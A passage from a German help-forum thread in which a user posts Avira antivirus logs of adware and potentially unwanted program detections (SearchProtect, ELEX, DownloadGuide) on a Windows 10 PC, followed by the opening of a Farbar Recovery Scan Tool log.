      in Datei 'C:\Users\Harun\AppData\Local\Temp\676367343\ic-0.7552d281d18108.exe
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 20:40 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\eAHPeNhIUJ\Uninstall.exe'
      enthält folgendes Muster 'Adware/ELEX.pjws' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '51b701fa.qua'
      verschoben!

10.04.2016 20:39 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ELEX.pjws [adware]'
      in Datei 'C:\Program Files (x86)\eAHPeNhIUJ\Uninstall.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 20:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ELEX.pjws [adware]'
      in Datei 'C:\Program Files (x86)\eAHPeNhIUJ\Uninstall.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 20:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ELEX.pjws [adware]'
      in Datei 'C:\Program Files (x86)\eAHPeNhIUJ\Uninstall.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:33 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe'
      enthält folgendes Muster 'PUA/DownloadGuide.MK' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26003.
      Die Datei konnte nicht gelöscht werden!
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '187c971e.qua'
      verschoben!

10.04.2016 17:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:30 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:30 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

10.04.2016 17:30 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:30 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:29 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:29 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

10.04.2016 17:29 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:29 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

09.04.2016 17:46 [System-Scanner] Malware gefunden
      Die Datei 'C:\ProgramData\eAHPeNhIUJ\protect\protect.exe'
      enthält folgendes Muster 'Adware/ELEX.epcr' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26003.
      Die Datei konnte nicht gelöscht werden!
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '067feebd.qua'
      verschoben!
      Der Registrierungseintrag
      <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eAHPeNhIUJ_protect\ImagePa
      th> wurde erfolgreich repariert.
      Der Registrierungseintrag
      <HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\eAHPeNhIUJ_protect\ImagePath>
      wurde erfolgreich repariert.

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '7cf612fb.qua'
      verschoben!

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files
      (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '5ad23591.qua'
      verschoben!

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files
      (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '705b4183.qua'
      verschoben!

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '3f0b6547.qua'
      verschoben!

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '00ab73e4.qua'
      verschoben!

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

07.04.2016 22:42 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

03.04.2016 14:31 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

03.04.2016 13:04 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:43 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe'
      enthält folgendes Muster 'PUA/YesSearch.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\Winsere\Winsere\Winsere.exe'
      enthält folgendes Muster 'ADWARE/ELEX.Gen (Cloud)' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '15ae1a2b.qua'
      verschoben!
      Der Registrierungseintrag
      <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsere\ImagePath> wurde
      erfolgreich repariert.
      Der Registrierungseintrag
      <HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Winsere\ImagePath> wurde
      erfolgreich repariert.

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe'
      enthält folgendes Muster 'HEUR/APC (Cloud)' [heuristic]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '47f040c3.qua'
      verschoben!
      Der Registrierungseintrag
      <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FFModules\ImagePath>
      wurde erfolgreich repariert.
      Der Registrierungseintrag
      <HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FFModules\ImagePath> wurde
      erfolgreich repariert.

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files
      (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe'
      enthält folgendes Muster 'HEUR/APC (Cloud)' [heuristic]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '5f4c6f5e.qua'
      verschoben!
      Der Registrierungseintrag
      <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eAHPeNhIUJ_update\ImagePat
      h> wurde erfolgreich repariert.
      Der Registrierungseintrag
      <HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\eAHPeNhIUJ_update\ImagePath>
      wurde erfolgreich repariert.

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\qksee\qksee.exe'
      enthält folgendes Muster 'Adware/ELEX.xwll' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '49a97b0a.qua'
      verschoben!

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

29.03.2016 15:37 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/Adposhel.onqd [adware]'
      in Datei 'C:\ProgramData\1cb4ac83-5b77-0\1cb4ac83-5b77-0.d gefunden.
      Durchgeführte Aktion: Zugriff verweigern

29.03.2016 15:37 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/Adposhel.onqd [adware]'
      in Datei 'C:\ProgramData\1cb4ac83-6a03-1\1cb4ac83-6a03-1.d gefunden.
      Durchgeführte Aktion: Zugriff verweigern

StOony 19.04.2016 13:23
Addition:
Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:18-04-2016
durchgeführt von Harun (2016-04-19 13:06:15)
Gestartet von C:\Users\Harun\Downloads
Windows 10 Pro (X64) (2015-07-29 11:28:54)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-2630849102-760198568-3561441068-500 - Administrator - Disabled)
